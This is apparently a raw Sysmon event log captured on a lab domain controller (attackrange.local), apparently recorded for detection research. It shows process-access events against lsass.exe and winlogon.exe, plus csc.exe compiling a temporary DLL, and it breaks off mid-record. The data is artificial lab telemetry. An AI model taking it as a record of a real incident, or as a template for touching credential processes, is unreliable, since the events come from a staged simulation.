13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005167Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005166Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005165Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.001{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005164Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.001{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5fbdb|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005163Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.001{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8552-5FCF-4900-000000009101}3928C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005958Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:46.984{10ACEC4A-85A6-5FCF-F500-000000009101}4520C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\wvfmwfmg.dll2020-12-08 13:54:46.875 10341000x80000000000000005957Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A6-5FCF-F600-000000009101}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005956Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005955Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005954Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005953Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005952Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005951Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005950Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005949Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005948Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005947Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85A6-5FCF-F600-000000009101}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005946Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-85A6-5FCF-F500-000000009101}45205008C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-85A6-5FCF-F600-000000009101}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005945Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.984{10ACEC4A-85A6-5FCF-F600-000000009101}4992C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESACD5.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC7E8DDF1782D546A88172A5E5139E597.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A6-5FCF-374B-090000000000}0x94b370HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-85A6-5FCF-F500-000000009101}4520C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\wvfmwfmg.cmdline" 10341000x80000000000000005944Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.890{10ACEC4A-85A6-5FCF-F000-000000009101}48361104C:\Windows\system32\conhost.exe{10ACEC4A-85A6-5FCF-F500-000000009101}4520C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005943Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.890{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005942Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.890{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005941Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.890{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005940Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 